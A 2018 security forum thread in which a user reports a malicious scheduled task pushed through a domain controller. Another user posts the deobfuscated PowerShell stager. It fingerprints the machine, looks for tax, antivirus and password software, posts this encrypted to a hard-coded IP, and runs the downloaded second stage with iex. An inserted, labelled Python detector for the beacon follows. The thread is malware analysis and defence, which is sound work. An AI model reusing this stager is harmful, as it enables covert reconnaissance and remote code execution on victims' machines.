A Memory Resident Virus ?


Postby 4everyone » Sun Jan 14, 2018 7:46 am

Happy New Year Folks !

I'm going through a situation where a scheduled task is getting deployed through the Domain Controller to the workstation, and the task is running wscript+powershell using a download link which is displayed in the scheduled task script.

Link is - http://192.96.206.191:9097/static/ka7ds ... AHSGA656gh

The above link has some code. Not sure what it's capable of or what this script actually does. Can someone let me know what the purpose of the above script is? Appreciate your help in advance.

Thanks
4Everyone

Re: A Memory Resident Virus ?

Postby xors » Sun Jan 14, 2018 12:00 pm

Can you add the script here as an attachment? :)
@xorsthings

Re: A Memory Resident Virus ?

Postby 4everyone » Sun Jan 14, 2018 4:33 pm

Thanks for your reply. Here you go.

Re: A Memory Resident Virus ?

Postby N3mes1s » Mon Jan 15, 2018 5:18 pm

Hello.
This is pretty interesting; it seems to be a recon script in PowerShell (I don't know if it's a known one and don't have time to check). After multiple layers obfuscated with Invoke-Obfuscation and various downloads from the same IP, this is the code.

It is self-explanatory at this stage, just read the function names :)

Code:
function GsdsetWweter {
    $Serv = $args[0]
    $SK = $args[1]
    $USAG = $args[2]
    $Null = [Reflection.Assembly]::LoadWithPartialName("System.Security");
    $Null = [Reflection.Assembly]::LoadWithPartialName("System.Core");
    $ErrorActionPreference = "SilentlyContinue";
    $e=[System.Text.Encoding]::ASCII;
    function Get-SysID($HashName = "MD5"){
        [string]$ret = ""
        $hd = gwmi win32_bios
        $ret = $hd["SerialNumber"].ToString()
        [string]$String = $([Environment]::UserName +[Environment]::MachineName + $ret).ToLower();
        $StringBuilder = New-Object System.Text.StringBuilder
        [System.Security.Cryptography.HashAlgorithm]::Create($HashName).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($String))|%{
            [Void]$StringBuilder.Append($_.ToString("x2"))
            }
            $e = $StringBuilder.ToString().ToLower()
            $e
        }
  Function HasGet-Bretring($ht) {
  $first = $true
  foreach($pair in $ht.GetEnumerator()) {
    if ($first)
    {
       $first = $false
    }
    else
    {
       $output += ';'
    }
    $output+="{0}" -f $($pair.Value)
   }
   $output
  }

 function Get-workconfig {
  Get-WmiObject Win32_NetworkAdapter -Filter 'NetConnectionStatus=2' |
    ForEach-Object {
      $result = 1 | Select-Object Name, IP, MAC, ID
      $result.Name = $_.Name
      $result.MAC = $_.MacAddress
      $result.ID = $_.DeviceID
      $config = $_.GetRelated('Win32_NetworkAdapterConfiguration')
      $result.IP = $config | Select-Object -expand IPAddress
      $result
    }
 
}
   
    function Get-Sysinfo {     
        $str = [Environment]::UserDomainName+'|'+[Environment]::UserName+'|'+[Environment]::MachineName;
        $string = ""
        foreach($c in Get-workconfig){
            [string]$lanname = $c.Name; [string]$macadr = $c.MAC; [string]$ID = $c.ID
            $ip = @{$true=$c.IP[0];$false=$p.IP}[$c.IP.Length -lt 6];
            [string]$ip = $c.IP[0]; if(!$ip -or $ip.trim() -eq '') {$ip='0.0.0.0'};
            $lanconf = @{
            id = $ID
            ip = $ip;
            mac =  $macadr;
            name = $lanname;
            }
           $string += HasGet-Bretring $lanconf
           $string += "!"
        }

        $o = (Get-WmiObject Win32_OperatingSystem)       
        $str += "|$string";
        $str += '|' +$o.Name.split('|')[0];
        if(([Environment]::UserName).ToLower() -eq "system"){
            $str += '|True'
        }
        else{
            $str += '|'+ ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
        }
        [void] [Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
        $Screens = [system.windows.forms.screen]::AllScreens
        foreach ($Screen in $Screens) {                       
            $Width  = $Screen.Bounds.Width           
            $Height  = $Screen.Bounds.Height
        }
        $str += '|' + "$Width`x$Height"
        $n = [System.Diagnostics.Process]::GetCurrentProcess()
        $str += '|'+$n.ProcessName+'|'+$n.Id
        $str += '|' + $PSVersionTable.PSVersion.Major
        $str += '|' + $ENV:PROCESSOR_ARCHITECTURE
        $str += '|' + (gwmi win32_timeZone -ComputerName $env:ComputerName).caption
        $str += '|' + $o.ConvertToDateTime($o.LastBootUpTime)
        $str
    }
   
function getlisturi{
    $RandName = -join("abcdefghijklmoprstvuxyz".ToCharArray()|Get-Random -Count $args[0]);$ar = @('php','jsp','asp') | Get-Random;
    $RandName + '.' + $ar
    }

    function Get-Soft {
    param (
        [Parameter(ValueFromPipeline=$true)]
        [string[]]$ComputerName = $env:COMPUTERNAME,
        [string]$NameRegex = '(Opera|Firefox|Chrome|TAX|Lacerte|OLT|ProSeries|Ultratax|Drake|Taxslayer|ProTaxPro|Taxwise|Avast|ESET|Malwarebytes|McAfee|Norton|Panda|Sophos|Webroot|Bitdefender|Symantec|Trust|EICAR|Virus|Firewall|Defender|Secury|Anti|Comodo|Kasper|quickbooks|keypass|ftp|ssh|Outlook)'
    )
    foreach ($comp in $ComputerName) {
        $keys = '','\Wow6432Node'
        foreach ($key in $keys) {
            try {
                $apps = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine',$comp).OpenSubKey("SOFTWARE$key\Microsoft\Windows\CurrentVersion\Uninstall").GetSubKeyNames()
            } catch {
                continue
            }
            foreach ($app in $apps) {
                $program = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine',$comp).OpenSubKey("SOFTWARE$key\Microsoft\Windows\CurrentVersion\Uninstall\$app")
                $name = $program.GetValue('DisplayName')
                $str = ''
                if ($name -and $name -match $NameRegex) {
                    $str += $name + ';'
                    $str
                }
            }
        }
    }
}
            try {
                $FirstAES=New-Object System.Security.Cryptography.AesCryptoServiceProvider;         }
            catch {
                $FirstAES=New-Object System.Security.Cryptography.RijndaelManaged;
            }
    $FirstIV = [byte] 0..255 | Get-Random -count 16;$FirstAES.Mode="CBC";
    $FirstAES.Key=$e.GetBytes($SK);
    $FirstAES.IV = $FirstIV;
    $csp = New-Object System.Security.Cryptography.CspParameters;
    $csp.Flags = $csp.Flags -bor [System.Security.Cryptography.CspProviderFlags]::UseMachineKeyStore;
    $rs = New-Object System.Security.Cryptography.RSACryptoServiceProvider -ArgumentList 2048,$csp;
    $rk=$rs.ToXmlString($False);$ib=$e.getbytes($rk);
    $eb=$FirstIV+$FirstAES.CreateEncryptor().TransformFinalBlock($ib,0,$ib.Length);
    $BotIDXor= Get-SysID;
    $EncodedText =[Convert]::ToBase64String($e.getbytes($BotIDXor));
    $EncodedText2 =[Convert]::ToBase64String($e.getbytes($EncodedText));
  if(-not $wc){
        [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
        $wc=new-object system.net.WebClient;
        $wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
        $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
    }
    $wc.Headers.Add("User-Agent",$USAG);
    $wc.Headers.Add("Cookie","SESSIONID:$EncodedText2");
    $raw=$wc.UploadData($Serv + "/" + $(getlisturi 9),"POST",$eb);
    write-host "STAGER GET raw   "  $raw
    $de=$e.GetString($rs.decrypt($raw,$false));
    $key=$de[0..($de.length-2)] -join '';
    $k=$de[$de.length-1] -join '';
  if ($k -eq 0) {
    $str1 =  Get-Sysinfo;
    $str2 =  Get-Soft;
    $str = $str1 + '|' + $str2
    }
  else{$str = 'OK'+ '|' + ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") + '|' + ([System.Diagnostics.Process]::GetCurrentProcess()).id}
    $SecondAES=New-Object System.Security.Cryptography.AesCryptoServiceProvider;
    $SecondIV = [byte] 0..255 | Get-Random -count 16;
    $SecondAES.Mode="CBC"; $SecondAES.Key=$e.GetBytes($key); $SecondAES.IV = $SecondIV;
    $ib2=$e.getbytes($str);
    $eb2=$SecondIV+$SecondAES.CreateEncryptor().TransformFinalBlock($ib2,0,$ib2.Length);
    $wc.Headers.Add("User-Agent",$USAG);
    $raw=$wc.UploadData($Serv+ "/" + $(getlisturi 13),"POST",$eb2);
try {$AES=New-Object System.Security.Cryptography.AesCryptoServiceProvider;}
catch {$AES=New-Object System.Security.Cryptography.RijndaelManaged;}
    $AES.Mode="CBC";
    $IV = $raw[0..15];$AES.Key=$e.GetBytes($key);$AES.IV = $IV;
    $shelles = [System.Text.Encoding]::ASCII.GetString($($AES.CreateDecryptor().TransformFinalBlock($raw[16..$raw.Length],0,$raw.Length-16)))
    iex $shelles
    $FirstAES=$null;$BotIDXor=$null;$rs=$null;$eb2=$null;$raw=$null;$IV=$null;$str=$null;$ib2=$null;$SecondAES=$null;$AES=$null; $SecondIV=$null;$shelles= $null;
    $Error.Clear()
    [GC]::Collect()
    [GC]::WaitForPendingFinalizers()
    federerfegegfeg $key "SESSIONID:$EncodedText2" $Serv '/sale/getinfo.php,/getnews.asp,/update/news.html,/defender/main.jsp,/mains.asp|Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36 Edge/12.0' $([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") $PSVersionTable.PSVersion.Major
    }
  GsdsetWweter 'https://192.96.206.191' ':nP&2[Ia+4E7)V~z.M5pvdrsXle$]!U(' 'Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36 Edge/12.0'


https://ghostbin.com/paste/83av7
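A defender-side check for this stager's beacon, added here as an example and not part of the thread or of the script above: it reads constructed proxy log lines (tab-separated method, URL, User-Agent, Cookie), flags POSTs whose path has the shape getlisturi builds and whose SESSIONID cookie decodes twice from Base64 to a 32-hex-character ID, and extracts that ID. The log layout and the bot ID are assumptions; the User-Agent, path alphabet, name lengths and cookie encoding come from the script.

```python
import base64
import re
from typing import List, Optional
from urllib.parse import urlsplit

# Beacon traits taken from the deobfuscated stager above.
STAGER_UA = ("Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36 Edge/12.0")
# getlisturi draws from this alphabet without replacement (Get-Random -Count),
# 9 chars for the first POST and 13 for the second, then appends php/jsp/asp.
STAGER_ALPHABET = set("abcdefghijklmoprstvuxyz")
PATH_RE = re.compile(r"^/([a-z]{9}|[a-z]{13})\.(php|jsp|asp)$")
MD5_HEX_RE = re.compile(r"^[0-9a-f]{32}$")


def looks_like_stager_path(path: str) -> bool:
    """True if the URL path has the shape getlisturi() produces."""
    m = PATH_RE.match(path)
    if not m:
        return False
    name = m.group(1)
    # drawn without replacement, so no letter repeats and all are in the alphabet
    return set(name) <= STAGER_ALPHABET and len(set(name)) == len(name)


def decode_bot_id(cookie: str) -> Optional[str]:
    """Undo the double Base64 in 'SESSIONID:<b64(b64(md5hex))>'; return the hex id or None."""
    if not cookie.startswith("SESSIONID:"):
        return None
    try:
        inner = base64.b64decode(cookie[len("SESSIONID:"):], validate=True)
        bot_id = base64.b64decode(inner, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return bot_id if MD5_HEX_RE.match(bot_id) else None


def is_stager_beacon(method: str, url: str, user_agent: str, cookie: str) -> bool:
    """All four traits must line up; a matching path alone is not enough."""
    return (method == "POST" and user_agent == STAGER_UA
            and looks_like_stager_path(urlsplit(url).path)
            and decode_bot_id(cookie) is not None)


def scan(log: str) -> List[str]:
    """Return the URLs of tab-separated log lines (method, url, UA, cookie) that match."""
    return [f[1] for f in (line.split("\t") for line in log.splitlines())
            if len(f) == 4 and is_stager_beacon(*f)]


# Constructed sample (not from the thread): a fake bot id, its double-encoded cookie,
# two beacons, one benign POST and one GET to a look-alike path.
FAKE_BOT_ID = "0123456789abcdef0123456789abcdef"
FAKE_COOKIE = "SESSIONID:" + base64.b64encode(base64.b64encode(FAKE_BOT_ID.encode())).decode()
SAMPLE_LOG = "\n".join([
    "\t".join(["POST", "https://192.96.206.191/kaldsvfxb.php", STAGER_UA, FAKE_COOKIE]),
    "\t".join(["POST", "https://192.96.206.191/tomdrexbyulav.asp", STAGER_UA, FAKE_COOKIE]),
    "\t".join(["POST", "https://example.test/login.php", "Mozilla/5.0 (Windows NT 10.0)", "PHPSESSID=abc"]),
    "\t".join(["GET", "https://192.96.206.191/abcdefghi.asp", STAGER_UA, "-"]),
])
```

Running `scan(SAMPLE_LOG)` returns only the two POST beacons; the decoded ID can then be compared across hosts, since the script derives it from username, machine name and BIOS serial.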

Re: A Memory Resident Virus ?

Postby 4everyone » Mon Jan 15, 2018 7:48 pm

Thanks for your time looking into this N3mes1s.

Regards,
4Everyone

Re: A Memory Resident Virus ?

Postby 4everyone » Fri Jan 19, 2018 6:04 pm

Hi N3mes1s,

I found another obfuscated script running through the GP. Can you please decode this for me, so that I will be able to get what it does?


Re: A Memory Resident Virus ?

Postby 4everyone » Fri Jan 19, 2018 10:57 pm

Don't worry about it. I got it figured out. Cheers!
